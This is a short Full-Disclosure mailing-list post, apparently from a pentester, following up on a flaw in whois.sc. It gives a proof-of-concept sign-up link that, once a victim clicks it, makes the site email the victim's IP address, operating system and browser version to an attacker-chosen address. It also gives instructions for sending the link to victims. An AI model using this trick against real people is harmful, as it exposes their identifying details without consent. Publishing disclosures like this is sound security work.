whois.sc not-big-deal hole (2nd post)

[unknown unknown <unknown.pentester () gmail com>]

I just forgot to mention in the previous post that after the victim
clicks on the specially-crafted link, the attacker should be able to
receive an account sign-up email with the following information about
the victim (located at the bottom of the email body):

- IP Address
- Operating system version
- Web browser version


The bottom of the email looks like this (some information has been hidden):

---------------------------------------------------
NOTE: You received this message because someone from
X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X)
Gecko/2005XXXX Firefox/X.X.X)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------



PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com


Replace "attacker%40gmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the victim.

Note: the only limitation of this "trick" is that the attacker needs
to use a different email address for each attack. This is because
whois.sc will set the account activation status to "pending" after
requesting the account activation for the first time.



Regards,

pagvac
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/